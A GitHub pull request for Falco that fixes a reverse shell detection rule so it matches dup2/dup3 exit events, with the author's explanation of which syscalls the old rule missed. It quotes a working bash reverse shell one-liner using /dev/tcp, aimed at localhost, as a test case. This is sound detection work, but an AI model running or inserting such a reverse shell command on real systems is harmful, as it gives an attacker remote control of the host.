New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
fix(rules): use exit event in reverse shell detection rule #2076
fix(rules): use exit event in reverse shell detection rule #2076
Conversation
In some cases the rule is not triggered when a reverse shell is spawned. That's because in the rule we are checking that the file descriptor passed as argument to the dup functions is of type socket and its fd number is "0, 1, or 2" and the event direction is "enter". The following event does not trigger the rule: dup2(socket_fd, STDIN_FILENO); But using the exit event the rule is triggered. Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>
Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>
/milestone 0.32.1 |
This is great! Thank you @alacuku! |
Good job! |
LGTM label has been added. Git tree hash: f79d288ba3da56976248773b2cf06938982fc24a
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
/approve
[APPROVALNOTIFIER] This PR is APPROVED This pull-request has been approved by: alacuku, jasondellaluce The full list of commands accepted by this bot can be found here. The pull request process is described here
Needs approval from an approver in each of these files:
Approvers can indicate their approval by writing |
What type of PR is this?
/kind bug
/kind rule-update
Any specific area of the project related to this PR?
/area rules
What this PR does / why we need it:
This PR updates the reverse shell detection rule to be triggered when a
dup2
ordup3
is called. Before the falcosecurity/libs#385 thedup2
anddup3
events were sent to userspace asdup
events.Which issue(s) this PR fixes:
In some cases the rule is not triggered when a reverse shell is spawned. That's because in the rule we are checking that the file descriptor passed to the dup functions is of type
socket
and its fd number is0, 1 or 2
and the event direction isenter
. The following code snippet is not detected as a reverse shell:That's obvious since we are not passing a file descriptor to the
dup2
syscall that satisfies the conditions required by the rule.On the other hand a command like this one:
/bin/bash -i >& /dev/tcp/127.0.0.1/9999 0>&1
(#1152 ) triggers the rule.Digging a little bit deeper we see that the following syscalls are involved:
The first
dup2(3,1)
is not detected by the rule but the subsequent calls are.The right way to detect such scenarios is to check the returned file descriptor in the
exit
events. In order to avoid dealing explicitly with the event direction we use the following fieldevt.rawres in (0, 1, 2)
present in theexit
events.Fixes #
Special notes for your reviewer:
As @leogr noted here, this PR needs to be merged after we bump Falco with a new driver version.
Does this PR introduce a user-facing change?: